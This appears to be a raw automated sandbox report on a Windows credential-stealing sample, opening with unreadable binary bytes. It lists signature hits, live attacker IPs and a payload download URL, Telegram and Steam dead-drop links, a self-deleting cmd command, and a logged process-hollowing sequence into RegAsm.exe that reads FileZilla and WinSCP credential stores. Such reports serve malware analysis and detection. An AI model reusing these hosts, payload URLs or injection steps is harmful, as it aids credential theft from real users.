#møv·+sAšrAá1»¿Z;…¡݄{®f¼ð°cÜiµÐÀ‰7 }¹ÀƒAmö|p⥏eˆ.må|šr‚›¸–ªÔ8Ù5§è0bÉÏ°ííaKÑg¸uº«BóºótöD+§©¤z8Ï5føwž¯÷7Gۑ(5 ªuÌW°+(J'.mÌõ'S‘ $Õ¤ÜÏo^ÄÉÔ¾.†“ †bÕ~'©¨¿ûh =þRìî½8œ€á“LqïÌþXÌàºÇ—“ãQþùndÔÚ«uÿÖÂâƑ}¸~©–€ˆº3 úÇ,'¶q5u1Úwð¿îÄ-9,aƒ>‘ ÝÊO’ÐDÀAhÜÃθHÕ èô{] -â—Ä“z¡»}~D’9Ìy€Ÿvwà?}»D² kñ=Μt0q‹:A°ýãi%sae¢WX{ë'œèº“ç~:âå1/{@.ÄXŸ¿Ñ}bY‘Ôh=gºŽþ<ðItX~VËͦCæ¹>—ü5p¨ôŸ±<‘f…ˆ^nÈ3ZêÚ|ĺ¿¨é¾yúh½ìõýšN³ƒ®XRê³÷L©WWO±R% "'%¡/ˆgü²í&ã¹øÚ»àJÉ)äv£í$öá\*ó_ýU†9¹Q“Ú©.ÃF,œ>^6‚TC8±½ e@° UÆR KÏ)fÏAÚ[æå µ‘õÔÁt]ˆõóïÐÀŠ—½Êr2Íy¹íð³°Áì(âéŽ+W±?H3¾r‚¦ùðWÂ…æ^[œnùEÚ,~óªf’ n¨¿møøÞãLNqK‘b™K )¶q=·\kÐݝUJªCïÁMM{¶È'M”ƒ™´Nõ#°Àø‰ýàœGW:…£^Â-„ósDT=¢Ž¬}y<Á눻‡ÃQ^š<uâ—H»Uy-Ür´g×}Ôe̾ÄxTõÙËÑÉ:;­„@Ï2:€5^/(.?ĦV!ÌT®ðÖ§ª¨¢ÐÅF °I!4t5áqÄXühkõKÒÓçÖҜílwäážßýf½ô)³0cÙ¸î·*-’ÜS²§e¨¤%”–"(AÙÜsûÁ]ïÈy}J.‰ûr¹?ÏÙú™P@`׳¨Ë¾³É×mìñÏ[û Ä 6‡‘˜öñFI±Â½]{ν¾²§kу ÒûKÏOÆ­º ÞeeävÝ$<DL,ßè‰"=G.ý÷E\ÖÝzËݾWdbsd¿Fïü†lƒ +ø3†û?öÙÌåÄJúLÈÖ¥Ñf éøžVçA‚økˤêw®¥ƒè™@™ ¸¥Ä·Õ«Â1„K’ó‹øhÞ*G¾tŽå›ý·\RõÎ(V8õ ¨ê0æ¼îøv¹Ðž¨˜ ÈF²©‹ïkOáØ&—\á' ºÈ#ÆÆ>7C O²§vüfRúõé{jÌ#é #ÍJlÝ=ÛµNÕ?+A=EPÊÖ@%¶]ÒÏ੉]aãÂ̍«.îı½f“”zJJìšÒ½î|Pù„×WHF¤tžéYzÓð«<‹óÆõ‚ƤNër”6Á~l2N]„æ×qËÇàp½;ûÏÉL5sí≫jªT2‹Üғ›šw%së‰äÝ9VYoªf‘ú©ç”g»L‘òú²c².Ò§j¿·.d\:Ÿh'ÓM Š^°ÐJÖ»=Ds¸vñ‘“òÓdíA+Ù;ZåÃ؉b£¿LÒÇaÁ¨!&¥;yçÁÂW´ .{o‰@zs œ$Âé뙔?³ ­DÈñ<‘Aç|5jâËáÜâ²ñeŒP|ßyhó*M\l<œ¨ß'gó¿©N}Á—_q4
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x0001ec00', u'virtual_address': u'0x00002000', u'entropy': 7.975834601363336, u'name': u'.text', u'virtual_size': u'0x0001eb14'} entropy 7.97583460136 description A section with a high entropy has been found
entropy 0.980079681275 description Overall entropy of this PE file is high
url http://147.45.44.104/get.php?ip=
url http://api.ipify.org
url http://147.45.44.104/prog/66e7dde32d7a4_vdsfg.exe
url https://t.me/edm0d
url https://steamcommunity.com/profiles/76561199768374681
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Match Windows Inet API call rule Str_Win32_Internet_API
description Client_SW_User_Data_Stealer rule Client_SW_User_Data_Stealer
description ftp clients info stealer rule infoStealer_ftpClients_Zero
description Match Windows Http API call rule Str_Win32_Http_API
description PWS Memory rule Generic_PWS_Memory_Zero
description Communications over HTTP rule Network_HTTP
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Match Windows Inet API call rule Str_Win32_Internet_API
description Win32 PWS Loki rule Win32_PWS_Loki_m_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
cmdline C:\Windows\System32\cmd.exe /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
host 147.45.44.104
host 78.47.207.136
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 135168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000204
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 2453504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000208
1 0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
file C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $”gãÐq °Ðq °Ðq °Ù š°Üq °Öð ±Üq °Öð ±Òq °Öð ±Éq °Öð±Ôq °› ±×q °Ðq°¥q °ºð±Ñq °ºðö°Ñq °Ðqž°Ñq °ºð ±Ñq °RichÐq °PELûÞçfà &2ž5P@@Ì^ð€Øq`TpÐS@P´.textw02 `.rdataŠP6@@.datapT@À.rsrcØq€rX@@.reloc`Ê@B
base_address: 0x00400000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer: ÿÿÿÿNæ@»±¿DüQ@.?AVbad_alloc@std@@üQ@.?AVbad_cast@std@@üQ@.?AVexception@std@@üQ@.?AVbad_array_new_length@std@@üQ@.?AVtype_info@@üQ@.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@üQ@.?AVios_base@std@@üQ@.?AV?$_Iosb@H@std@@üQ@.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@üQ@.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@üQ@.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@üQ@.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
base_address: 0x00407000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer: ¼0000D0[0b0•0œ0½0Ã0ß0ÿ011?1P1Y1q1w11“1¯1Ï1à1é192P2§2´2Å23"33383u33Z4t4æ4õ45/5f5o5w5±5Ð5ý5}6°6º6ê6/7?7G7]7’7Ä7ì788B8Q8ˆ8ª8è89G9“9›9c:µ:Ñ:ú:';_;|;¨;Ì;Ô;<Y<ú<m=‚=/>í>Y?ã? 0F0U0Ò0 11ï1-2l2J3§3a4~4µ4 55&545L55ç5±67737h7×78X8Ü8û89 969E9r9x9–9©9À9È9Ö9Û9á9:+:S:_:|:˜:­:Å:ð:&;5;W;c;i;r;;À;ë;ô;#=„>k?Ü?ô?0Œ00;0L0T0Z0m0v00ˆ0›0©0¯0µ0»0Á0Ç0Î0Õ0Ü0ã0ê0ñ0ø01111%1*101:1D1T1d1t1}1¡1¯1µ1»1Á1Ç1Í1Ô1Û1â1é1ð1÷1þ1222!2&2,262@2S2X2­2ü2%3Œ3·3Ì3Ñ3Ö3÷3ü3 4C4x4d55Ã5é5ø5666!6'6-636H6]6d6j6|6†6î6û6#757p7v7Š7±7À7É7Ö7ì7&8/8C8I8s8y8Ÿ8¨8®8Á89¦9°9ä9:A:G:¤:­:²:Å:Ù:Þ:ñ:;.;p;u;‰;“;œ;E<N<V<’<œ<¥<®<Ã<Ì<û<= ==$=F=M=\=f=l=r=x=~=„=Š==–=œ=¢=¨=®=´=º=À=Æ=Ì=Ò=Ø=Þ=ä=ê=ð=ö=ü=>>>>> >*>Í>Ó>?4?k?”?´?Ø?å?@050d0n0PX´1À1Ä1Ð1Ô1ð1ô1ø1ü1222 222(2,202p3t3x3|3€3„3ˆ3Œ33”3˜3œ3 3¤3¨3¬3°3´3¸3¼3À3 444p4ˆ4 55 5$5,5D5T5X5\5`5d5x5|5Œ55¨5¬5°5¸5Ð5Ô5ì5ð5ô5ø5ü566 6$6<6@6D6L6T6X6\6`6t6x66 6¤6¼6Ì6Ð6Ô6Ü6ô6777(7,7<7@7X7h7l7„7ˆ7 7°7´7Ä7È7Ì7à7ð7ô7ø7 88(8,848L8P8h8x8|8”8˜8œ8 8°<Ð<Ü<ü<=(=X=x=€=ˆ==œ=¼=Ä=Ü=à=ü=>>>>>$>(>,>4>H>P>T>\>p>x>€>ˆ>œ>¤>¬>´>È>p  0¼0Ø0ô0141p1Œ1¨1ä1 2X2
base_address: 0x00420000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $?dè]^ »]^ »]^ »2(¡»E^ »2(”»R^ »2( »b^ »T&‰»X^ »T&™»M^ »Ý' º^^ »]^ »Æ^ »2(¥»M^ »2(—»\^ »Rich]^ »PEL™äfà"  Þ>äð@p%67@‚ÀSX˜ÀSX˜€«È%° %Ì2ð.textÝÝÞ à.rdatažÉðÊâ@@.data,H!À(¬@À.rsrc°%Ô@@.relocH %JÖ@B
base_address: 0x00400000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

 buffer: €0€ HX%Vä<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> </assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00651000
process_identifier: 2400
process_handle: 0x00000208
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2400
process_handle: 0x00000208
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $”gãÐq °Ðq °Ðq °Ù š°Üq °Öð ±Üq °Öð ±Òq °Öð ±Éq °Öð±Ôq °› ±×q °Ðq°¥q °ºð±Ñq °ºðö°Ñq °Ðqž°Ñq °ºð ±Ñq °RichÐq °PELûÞçfà &2ž5P@@Ì^ð€Øq`TpÐS@P´.textw02 `.rdataŠP6@@.datapT@À.rsrcØq€rX@@.reloc`Ê@B
base_address: 0x00400000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $?dè]^ »]^ »]^ »2(¡»E^ »2(”»R^ »2( »b^ »T&‰»X^ »T&™»M^ »Ý' º^^ »]^ »Æ^ »2(¥»M^ »2(—»\^ »Rich]^ »PEL™äfà"  Þ>äð@p%67@‚ÀSX˜ÀSX˜€«È%° %Ì2ð.textÝÝÞ à.rdatažÉðÊâ@@.data,H!À(¬@À.rsrc°%Ô@@.relocH %JÖ@B
base_address: 0x00400000
process_identifier: 2400
process_handle: 0x00000208
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
process RegAsm.exe useragent IP Fetcher
process RegAsm.exe useragent File Downloader
process RegAsm.exe useragent IP Sender
process RegAsm.exe useragent
process RegAsm.exe useragent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
Process injection Process 1440 called NtSetContextThread to modify thread in remote process 2156
Process injection Process 2308 called NtSetContextThread to modify thread in remote process 2400
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 2750904
registers.edi: 0
registers.eax: 4207877
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 2156
1 0 0

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 2686712
registers.edi: 0
registers.eax: 4292580
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000204
process_identifier: 2400
1 0 0
url http://147.45.44.104/get.php?ip=
url http://147.45.44.104/prog/66e7dde32d7a4_vdsfg.exe
Process injection Process 1440 resumed a thread in remote process 2156
Process injection Process 2308 resumed a thread in remote process 2400
Process injection Process 2400 resumed a thread in remote process 2884
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000200
suspend_count: 1
process_identifier: 2156
1 0 0

NtResumeThread

 thread_handle: 0x00000204
suspend_count: 1
process_identifier: 2400
1 0 0

NtResumeThread

 thread_handle: 0x00000324
suspend_count: 1
process_identifier: 2884
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 1440
1 0 0

NtResumeThread

 thread_handle: 0x00000158
suspend_count: 1
process_identifier: 1440
1 0 0

NtResumeThread

 thread_handle: 0x00000194
suspend_count: 1
process_identifier: 1440
1 0 0

CreateProcessInternalW

 thread_identifier: 2160
thread_handle: 0x00000200
process_identifier: 2156
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000204
1 1 0

NtGetContextThread

 thread_handle: 0x00000200
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 135168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000204
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $”gãÐq °Ðq °Ðq °Ù š°Üq °Öð ±Üq °Öð ±Òq °Öð ±Éq °Öð±Ôq °› ±×q °Ðq°¥q °ºð±Ñq °ºðö°Ñq °Ðqž°Ñq °ºð ±Ñq °RichÐq °PELûÞçfà &2ž5P@@Ì^ð€Øq`TpÐS@P´.textw02 `.rdataŠP6@@.datapT@À.rsrcØq€rX@@.reloc`Ê@B
base_address: 0x00400000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2156
process_handle: 0x00000204
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00405000
process_identifier: 2156
process_handle: 0x00000204
